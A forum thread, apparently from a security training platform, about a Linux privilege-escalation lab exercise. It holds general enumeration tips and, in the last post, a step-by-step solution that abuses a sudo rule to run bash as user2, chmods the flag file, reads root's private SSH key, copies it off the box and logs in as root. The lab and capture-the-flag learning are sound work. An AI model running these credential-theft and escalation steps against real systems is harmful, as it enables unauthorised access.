Privilege Escalation

Tutorials Other
,
1

Hello Guys,

Need a quick help with the privilage escalation module questions “SSH into the server above with the provided credentials, and use the ‘-p xxxxxx’ to specify the port shown above. Once you login, try to find a way to move to ‘user2’, to get the flag in ‘/home/user2/flag.txt’.”

First I tried running the command $ sudo su user2 - but I got the error “Sorry, user user1 is not allowed to execute ‘/usr/bin/su user2’” so I think I need to escalate my privilage first.

I downloaded the linpeas.sh script on my original host, started a http server on this host and tried to download the script on the remote server using tun0 interface IP but I am stuck now as the remote server can’t connect to the host and keeps timing out.

Any ideas on how to solve this question or what am I missing?

2

I haven’t done this module so I don’t know the answer here, however, I can make some general comments.

  • I think moving from user1 to user2 is privilege escalation, I don’t think you need to elevate in order to move as such.
  • In general, enumeration is the key for Linux privesc. There are lots of ways to switch users and you can switch su without sudo.
  • Look for files with passwords such as bash history, configuration files, etc. This is often a good way to see if there are some credentials lying around you can reuse.
  • Check running processes to see if anything is badly configured.
  • Look for files your account shares with the target account (check group membership, then use something like find / -group WHATEVER 2>/dev/null to see what exists)
  • Look for files owned by the target account which are readable to you (find helps again)

As it is an academy box, there should be some clues/guidance in the training material around in the module.

1 Like
3

Read the Hint —CHMOD

4

i believe this should help anyone who needs it… please do not hesitate to write at me for questions.

1 Like
5

Hi,
I’ve got one question?
have you ever tried this yourself?
because this → “Step 6: use this command to view the /flag.txt fileexample; cat flag.txt”
does not work.
regards

SORRY - DISREGARD PLEASE

6

It doesn’t work though so what changed

7 
ssh user1@IP -p PORT
sudo -l
#we can see that /bin/bash of user2 is available
sudo -u user2 /bin/bash -c 'chmod 777 /home/user2/flag.txt'
#now we have access to flag.txt at /home/user2/flag.txt
sudo -u user2 /bin/bash -c 'cat /root/.ssh/id_rsa' > /home/user1/id_rsa
#now we have private ssh key at our home directory
#then from our HTB user we have to copy private key to our HTB machine:
ssh user1@IP -p PORT 'cat /home/user1/id_rsa' > ~/id_rsa
chmod 600 id_rsa
ssh root@IP -p PORT -i id_rsa
whoami
#root 
cat /root/flag.txt